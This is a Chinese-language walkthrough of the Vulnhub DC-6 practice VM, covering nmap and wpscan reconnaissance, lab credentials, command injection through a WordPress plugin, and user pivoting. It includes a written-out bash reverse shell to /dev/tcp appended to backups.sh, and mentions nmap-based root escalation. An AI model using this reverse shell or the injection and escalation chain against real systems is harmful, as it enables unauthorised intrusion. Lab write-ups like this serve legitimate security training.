Vulnhub靶机：DC-6

简介

Vulnhub是一个提供各种漏洞环境的靶场平台，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标，挑战的目标是获取操作系统的root权限和查看flag。

部署方法

官网：https://www.vulnhub.com

1.在官网搜索你想要的镜像,然后下载【建议下载 (Mirror)版本】

2.下载好后解压得到.ova的文件，右击选择VMware进行打开

3.在弹出的框中，选择存放的位置，然后点击导入

4.最后等待导入完成，然后启动该虚拟机就可以了

5.DC-6需要在etc/hosts配置一下

一，信息收集

我是用kali的arp-scan，也可以用namp扫网段扫出来。这里可以用很多工具扫出来之举例一种。

arp-scan -I eth1 -l

-I 指定eth1这个网卡

-l 扫描出全部主机

我们知道靶机的IP地址在192.168.30.7后使用namp扫描靶机。

nmap 192.168.30.7 -A -O -p 1-65535

• -A 进行全面扫描，包括服务版本探测、操作系统检测等。
• -O 进行操作系统检测，尝试识别远程主机的操作系统类型。
• -p 指定要扫描的端口范围或特定端口，如1-65535或80,443。

开放22，80端口。靶机上运行的CMS是wordpress

因为是wordpress我们直接用现成的工具去扫描。

wpscan --url http://wordy/ --enumerate p,t,u

p是扫描网页中安装的插件

t是扫描网页中的主题。

u是扫描网页中的账户。

这里发现5个用户保存下来。

爆破的话还差一个密码字典。在这里我跑了好几个字典都没爆出密码来。去看了一下别人的渗透过程。还是字典太小了。

重新爆破太耗时了我就直接拿账户和密码了。

mark/helpdesk01

跑一下后台。

dirsearch -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u http://192.168.30.7/

用之前的账号密码登进去就好了。

看了一下在activity monitor里的tools可以注入命令。

不过有限制。抓包改一下就好了。不知道这里f12改一下行不行，我试了一下好像是不行。

拿到shell后，就老三套，拿脚本，加权，运行。

没什么可以利用的地方。看来要换个用户去跑脚本。找一下/home下的文件看看。

猎奇，在mark用户里发现了graham的密码

graham/GSo7isUM1D4

shell登录一下。

这里看起来好像还要在跳一次用户。主要是其他地方都很正常。

echo 'bash -i >& /dev/tcp/192.168.30.3/4444 0>&1' >>backups.sh

把jens的shell在弹给kali。

在拿jens用户跑一下脚本。

发现nmap可以提权。

从这个网站找到提权命令nmap | 走开Bins

好了这样就拿到root了。

结束渗透了。

后续

其实这次的靶机渗透还挺简单的，就是跑密码很烦，还有跳graham用户有点离奇。其他都还好。